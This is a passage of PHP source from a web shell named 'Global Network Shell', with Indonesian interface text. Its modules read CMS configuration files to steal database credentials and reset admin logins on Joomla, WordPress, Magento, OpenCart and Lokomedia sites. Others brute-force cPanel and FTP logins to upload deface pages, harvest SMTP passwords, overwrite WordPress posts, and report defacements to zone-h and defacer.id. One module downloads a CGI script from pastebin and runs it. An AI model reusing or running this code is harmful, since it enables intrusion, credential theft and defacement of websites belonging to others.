  1692.                     $dbpass = ambilkata($config,"password = '","'");
  1693.                     $dbname = ambilkata($config,"db = '","'");
  1694.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1695.                     $prefix = $dbprefix."users";
  1696.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1697.                     $db = mysql_select_db($dbname);
  1698.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1699.                     $result = mysql_fetch_array($q);
  1700.                     $id = $result['id'];
  1701.                     $site = ambilkata($config,"sitename = '","'");
  1702.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1703.                     echo "Config => ".$file_conf."<br>";
  1704.                     echo "CMS => Joomla<br>";
  1705.                     if($site == '') {
  1706.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1707.                     } else {
  1708.                         echo "Sitename => $site<br>";
  1709.                     }
  1710.                     if(!$update OR !$conn OR !$db) {
  1711.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1712.                     } else {
  1713.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1714.                     }
  1715.                     mysql_close($conn);
  1716.                 } elseif(preg_match("/WordPress/",$config)) {
  1717.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1718.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1719.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1720.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1721.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1722.                     $prefix = $dbprefix."users";
  1723.                     $option = $dbprefix."options";
  1724.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1725.                     $db = mysql_select_db($dbname);
  1726.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1727.                     $result = mysql_fetch_array($q);
  1728.                     $id = $result[ID];
  1729.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1730.                     $result2 = mysql_fetch_array($q2);
  1731.                     $target = $result2[option_value];
  1732.                     if($target == '') {
  1733.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1734.                     } else {
  1735.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1736.                     }
  1737.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1738.                     echo "Config => ".$file_conf."<br>";
  1739.                     echo "CMS => Wordpress<br>";
  1740.                     echo $url_target;
  1741.                     if(!$update OR !$conn OR !$db) {
  1742.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1743.                     } else {
  1744.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1745.                     }
  1746.                     mysql_close($conn);
  1747.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1748.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1749.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1750.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1751.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1752.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1753.                     $prefix = $dbprefix."admin_user";
  1754.                     $option = $dbprefix."core_config_data";
  1755.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1756.                     $db = mysql_select_db($dbname);
  1757.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1758.                     $result = mysql_fetch_array($q);
  1759.                     $id = $result[user_id];
  1760.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1761.                     $result2 = mysql_fetch_array($q2);
  1762.                     $target = $result2[value];
  1763.                     if($target == '') {
  1764.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1765.                     } else {
  1766.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1767.                     }
  1768.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1769.                     echo "Config => ".$file_conf."<br>";
  1770.                     echo "CMS => Magento<br>";
  1771.                     echo $url_target;
  1772.                     if(!$update OR !$conn OR !$db) {
  1773.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1774.                     } else {
  1775.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1776.                     }
  1777.                     mysql_close($conn);
  1778.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1779.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1780.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1781.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1782.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1783.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1784.                     $prefix = $dbprefix."user";
  1785.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1786.                     $db = mysql_select_db($dbname);
  1787.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1788.                     $result = mysql_fetch_array($q);
  1789.                     $id = $result[user_id];
  1790.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1791.                     if($target == '') {
  1792.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1793.                     } else {
  1794.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1795.                     }
  1796.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1797.                     echo "Config => ".$file_conf."<br>";
  1798.                     echo "CMS => OpenCart<br>";
  1799.                     echo $url_target;
  1800.                     if(!$update OR !$conn OR !$db) {
  1801.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1802.                     } else {
  1803.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1804.                     }
  1805.                     mysql_close($conn);
  1806.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1807.                     $dbhost = ambilkata($config,'server = "','"');
  1808.                     $dbuser = ambilkata($config,'username = "','"');
  1809.                     $dbpass = ambilkata($config,'password = "','"');
  1810.                     $dbname = ambilkata($config,'database = "','"');
  1811.                     $prefix = "users";
  1812.                     $option = "identitas";
  1813.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1814.                     $db = mysql_select_db($dbname);
  1815.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1816.                     $result = mysql_fetch_array($q);
  1817.                     $target = $result[alamat_website];
  1818.                     if($target == '') {
  1819.                         $target2 = $result[url];
  1820.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1821.                         if($target2 == '') {
  1822.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1823.                         } else {
  1824.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1825.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1826.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1827.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1828.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1829.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1830.                             } else {
  1831.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1832.                             }
  1833.                         }
  1834.                     } else {
  1835.                         $cek_login = file_get_contents("$target/adminweb/");
  1836.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1837.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1838.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1839.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1840.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1841.                         } else {
  1842.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1843.                         }
  1844.                     }
  1845.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1846.                     echo "Config => ".$file_conf."<br>";
  1847.                     echo "CMS => Lokomedia<br>";
  1848.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1849.                         echo $url_target2;
  1850.                     } else {
  1851.                         echo $url_target;
  1852.                     }
  1853.                     if(!$update OR !$conn OR !$db) {
  1854.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1855.                     } else {
  1856.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1857.                     }
  1858.                     mysql_close($conn);
  1859.                 }
  1860.             }
  1861.         }
  1862.     } else {
  1863.         echo "<center>
  1864.         <h1>Auto Edit User Config</h1>
  1865.         <form method='post'>
  1866.         DIR Config: <br>
  1867.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1868.         Set User & Pass: <br>
  1869.         <input type='text' name='user_baru' value='global' placeholder='user_baru'><br>
  1870.         <input type='text' name='pass_baru' value='global' placeholder='pass_baru'><br>
  1871.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1872.         </form>
  1873.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1874.         ";
  1875.     }
  1876. } elseif($_GET['do'] == 'cpanel') {
  1877.     if($_POST['crack']) {
  1878.         $usercp = explode("\r\n", $_POST['user_cp']);
  1879.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1880.         $i = 0;
  1881.         foreach($usercp as $ucp) {
  1882.             foreach($passcp as $pcp) {
  1883.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1884.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1885.                     } else {
  1886.                         $_SESSION[$ucp] = "1";
  1887.                         $_SESSION[$pcp] = "1";
  1888.                         if($ucp == '' || $pcp == '') {
  1889.                            
  1890.                         } else {
  1891.                             $i++;
  1892.                             if(function_exists('posix_getpwuid')) {
  1893.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  1894.                                 if($domain_cp == '') {
  1895.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1896.                                 } else {
  1897.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1898.                                     foreach($domains_cp[1] as $dj) {
  1899.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1900.                                         $user_cp_url = $user_cp_url['name'];
  1901.                                         if($user_cp_url == $ucp) {
  1902.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  1903.                                             break;
  1904.                                         }
  1905.                                     }
  1906.                                 }
  1907.                             } else {
  1908.                                 $dom = "<font color=red>function is Disable by system</font>";
  1909.                             }
  1910.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  1911.                         }
  1912.                     }
  1913.                 }
  1914.             }
  1915.         }
  1916.         if($i == 0) {
  1917.         } else {
  1918.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Global Network Shell.</font>";
  1919.         }
  1920.     } else {
  1921.         echo "<center>
  1922.         <form method='post'>
  1923.         USER: <br>
  1924.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1925.         $_usercp = fopen("/etc/passwd","r");
  1926.         while($getu = fgets($_usercp)) {
  1927.             if($getu == '' || !$_usercp) {
  1928.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1929.             } else {
  1930.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1931.                 foreach($u[1] as $user_cp) {
  1932.                         if(is_dir("/home/$user_cp/public_html")) {
  1933.                             echo "$user_cp\n";
  1934.                     }
  1935.                 }
  1936.             }
  1937.         }
  1938.         echo "</textarea><br>
  1939.         PASS: <br>
  1940.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1941.         function cp_pass($dir) {
  1942.             $pass = "";
  1943.             $dira = scandir($dir);
  1944.             foreach($dira as $dirb) {
  1945.                 if(!is_file("$dir/$dirb")) continue;
  1946.                 $ambil = file_get_contents("$dir/$dirb");
  1947.                 if(preg_match("/WordPress/", $ambil)) {
  1948.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1949.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1950.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1951.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1952.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1953.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1954.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1955.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1956.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1957.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  1958.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  1959.                     if(preg_match('/"/', $pass1[1])) {
  1960.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1961.                         $pass .= $pass1[1]."\n";
  1962.                     } else {
  1963.                         $pass .= $pass1[1]."\n";
  1964.                     }
  1965.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1966.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1967.                 }
  1968.             }
  1969.             echo $pass;
  1970.         }
  1971.         $cp_pass = cp_pass($dir);
  1972.         echo $cp_pass;
  1973.         echo "</textarea><br>
  1974.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1975.         </form>
  1976.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1977.     }
  1978. } elseif($_GET['do'] == 'cpftp_auto') {
  1979.     if($_POST['crack']) {
  1980.         $usercp = explode("\r\n", $_POST['user_cp']);
  1981.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1982.         $i = 0;
  1983.         foreach($usercp as $ucp) {
  1984.             foreach($passcp as $pcp) {
  1985.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1986.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1987.                     } else {
  1988.                         $_SESSION[$ucp] = "1";
  1989.                         $_SESSION[$pcp] = "1";
  1990.                         if($ucp == '' || $pcp == '') {
  1991.                             //
  1992.                         } else {
  1993.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1994.                             $ftp_conn = ftp_connect($ip);
  1995.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1996.                             if((!$ftp_login) || (!$ftp_conn)) {
  1997.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  1998.                             } else {
  1999.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  2000.                                 $fi = htmlspecialchars($_POST['file_deface']);
  2001.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2002.                                 if($deface) {
  2003.                                     $i++;
  2004.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  2005.                                     if(function_exists('posix_getpwuid')) {
  2006.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  2007.                                         if($domain_cp == '') {
  2008.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2009.                                         } else {
  2010.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2011.                                             foreach($domains_cp[1] as $dj) {
  2012.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2013.                                                 $user_cp_url = $user_cp_url['name'];
  2014.                                                 if($user_cp_url == $ucp) {
  2015.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2016.                                                     break;
  2017.                                                 }
  2018.                                             }
  2019.                                         }
  2020.                                     } else {
  2021.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2022.                                     }
  2023.                                 } else {
  2024.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2025.                                 }
  2026.                             }
  2027.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2028.                         }
  2029.                     }
  2030.                 }
  2031.             }
  2032.         }
  2033.         if($i == 0) {
  2034.         } else {
  2035.             echo "<br>sukses deface ".$i." Cpanel by <font color=lime>Global Network.</font>";
  2036.         }
  2037.     } else {
  2038.         echo "<center>
  2039.         <form method='post'>
  2040.         Filename: <br>
  2041.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2042.         Deface Page: <br>
  2043.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  2044.         USER: <br>
  2045.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2046.         $_usercp = fopen("/etc/passwd","r");
  2047.         while($getu = fgets($_usercp)) {
  2048.             if($getu == '' || !$_usercp) {
  2049.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2050.             } else {
  2051.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2052.                 foreach($u[1] as $user_cp) {
  2053.                         if(is_dir("/home/$user_cp/public_html")) {
  2054.                             echo "$user_cp\n";
  2055.                     }
  2056.                 }
  2057.             }
  2058.         }
  2059.         echo "</textarea><br>
  2060.         PASS: <br>
  2061.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2062.         function cp_pass($dir) {
  2063.             $pass = "";
  2064.             $dira = scandir($dir);
  2065.             foreach($dira as $dirb) {
  2066.                 if(!is_file("$dir/$dirb")) continue;
  2067.                 $ambil = file_get_contents("$dir/$dirb");
  2068.                 if(preg_match("/WordPress/", $ambil)) {
  2069.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2070.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2071.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2072.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2073.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2074.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2075.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2076.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2077.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2078.                 } elseif(preg_match("/client/", $ambil)) {
  2079.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2080.                     if(preg_match('/"/', $pass1[1])) {
  2081.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2082.                         $pass .= $pass1[1]."\n";
  2083.                     }
  2084.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2085.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2086.                 }
  2087.             }
  2088.             echo $pass;
  2089.         }
  2090.         $cp_pass = cp_pass($dir);
  2091.         echo $cp_pass;
  2092.         echo "</textarea><br>
  2093.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2094.         </form>
  2095.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2096.     }
  2097. } elseif($_GET['do'] == 'smtp') {
  2098.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2099.     function scj($dir) {
  2100.         $dira = scandir($dir);
  2101.         foreach($dira as $dirb) {
  2102.             if(!is_file("$dir/$dirb")) continue;
  2103.             $ambil = file_get_contents("$dir/$dirb");
  2104.             $ambil = str_replace("$", "", $ambil);
  2105.             if(preg_match("/JConfig|joomla/", $ambil)) {
  2106.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2107.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2108.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2109.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2110.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2111.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2112.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2113.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2114.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2115.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2116.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2117.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2118.             }
  2119.         }
  2120.     }
  2121.     $smpt_hunter = scj($dir);
  2122.     echo $smpt_hunter;
  2123. } elseif($_GET['do'] == 'auto_wp') {
  2124.     if($_POST['hajar']) {
  2125.         $title = htmlspecialchars($_POST['new_title']);
  2126.         $pn_title = str_replace(" ", "-", $title);
  2127.         if($_POST['cek_edit'] == "Y") {
  2128.             $script = $_POST['edit_content'];
  2129.         } else {
  2130.             $script = $title;
  2131.         }
  2132.         $conf = $_POST['config_dir'];
  2133.         $scan_conf = scandir($conf);
  2134.         foreach($scan_conf as $file_conf) {
  2135.             if(!is_file("$conf/$file_conf")) continue;
  2136.             $config = file_get_contents("$conf/$file_conf");
  2137.             if(preg_match("/WordPress/", $config)) {
  2138.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2139.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2140.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2141.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2142.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2143.                 $prefix = $dbprefix."posts";
  2144.                 $option = $dbprefix."options";
  2145.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2146.                 $db = mysql_select_db($dbname);
  2147.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2148.                 $result = mysql_fetch_array($q);
  2149.                 $id = $result[ID];
  2150.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2151.                 $result2 = mysql_fetch_array($q2);
  2152.                 $target = $result2[option_value];
  2153.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2154.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2155.                 echo "<div style='margin: 5px auto;'>";
  2156.                 if($target == '') {
  2157.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2158.                 } else {
  2159.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2160.                 }
  2161.                 if(!$update OR !$conn OR !$db) {
  2162.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2163.                 } else {
  2164.                     echo "<font color=lime>sukses di ganti.</font><br>";
  2165.                 }
  2166.                 echo "</div>";
  2167.                 mysql_close($conn);
  2168.             }
  2169.         }
  2170.     } else {
  2171.         echo "<center>
  2172.         <h1>Auto Edit Title+Content WordPress</h1>
  2173.         <form method='post'>
  2174.         DIR Config: <br>
  2175.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2176.         Set Title: <br>
  2177.         <input type='text' name='new_title' value='Hacked by global network' placeholder='New Title'><br><br>
  2178.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2179.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2180.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2181.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2182.         </form>
  2183.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2184.         ";
  2185.     }
  2186. }elseif($_GET['do'] == 'defacerid') {
  2187. echo "<center><form method='post'>
  2188.         <u>Defacer</u>: <br>
  2189.         <input type='text' name='hekel' size='50' value='Fuck'><br>
  2190.         <u>Team</u>: <br>
  2191.         <input type='text' name='tim' size='50' value='Global Network'><br>
  2192.         <u>Domains</u>: <br>
  2193.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2194.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2195.         </form>";
  2196. $site = explode("\r\n", $_POST['sites']);
  2197. $go = $_POST['go'];
  2198. $hekel = $_POST['hekel'];
  2199. $tim = $_POST['tim'];
  2200. if($go) {
  2201. foreach($site as $sites) {
  2202. $zh = $sites;
  2203. $form_url = "https://www.defacer.id/notify";
  2204. $data_to_post = array();
  2205. $data_to_post['attacker'] = "$hekel";
  2206. $data_to_post['team'] = "$tim";
  2207. $data_to_post['poc'] = 'SQL Injection';
  2208. $data_to_post['url'] = "$zh";
  2209. $curl = curl_init();
  2210. curl_setopt($curl,CURLOPT_URL, $form_url);
  2211. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2212. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2213. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2214. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2215. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2216. $result = curl_exec($curl);
  2217. echo $result;
  2218. curl_close($curl);
  2219. echo "<br>";
  2220. }
  2221. }
  2222. } elseif($_GET['do'] == 'zoneh') {
  2223.     if($_POST['submit']) {
  2224.         $domain = explode("\r\n", $_POST['url']);
  2225.         $nick =  $_POST['nick'];
  2226.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2227.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2228.         function zoneh($url,$nick) {
  2229.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2230.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2231.                   curl_setopt($ch, CURLOPT_POST, true);
  2232.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2233.             return curl_exec($ch);
  2234.                   curl_close($ch);
  2235.         }
  2236.         foreach($domain as $url) {
  2237.             $zoneh = zoneh($url,$nick);
  2238.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2239.                 echo "$url -> <font color=lime>OK</font><br>";
  2240.             } else {
  2241.                 echo "$url -> <font color=red>ERROR</font><br>";
  2242.             }
  2243.         }
  2244.     } else {
  2245.         echo "<center><form method='post'>
  2246.         <u>Defacer</u>: <br>
  2247.         <input type='text' name='nick' size='50' value='Jonathan Miles'><br>
  2248.         <u>Domains</u>: <br>
  2249.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2250.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2251.         </form>";
  2252.     }
  2253.     echo "</center>";
  2254. } elseif($_GET['do'] == 'cgi') {
  2255.     $cgi_dir = mkdir('idx_cgi', 0755);
  2256.     $file_cgi = "idx_cgi/cgi.izo";
  2257.     $isi_htcgi = "AddHandler cgi-script .izo";
  2258.     $htcgi = fopen(".htaccess", "w");
  2259.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  2260.     $cgi = fopen($file_cgi, "w");
  2261.     fwrite($cgi, $cgi_script);
  2262.     fwrite($htcgi, $isi_htcgi);
  2263.     chmod($file_cgi, 0755);
  2264.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2265. } elseif($_GET['do'] == 'fake_root') {
  2266.     ob_start();
  2267.     $cwd = getcwd();
  2268.     $ambil_user = explode("/", $cwd);
  2269.     $user = $ambil_user[2];
  2270.     if($_POST['reverse']) {
  2271.         $site = explode("\r\n", $_POST['url']);
  2272.         $file = $_POST['file'];
  2273.         foreach($site as $url) {
  2274.             $cek = getsource("$url/~$user/$file");
  2275.             if(preg_match("/hacked/i", $cek)) {
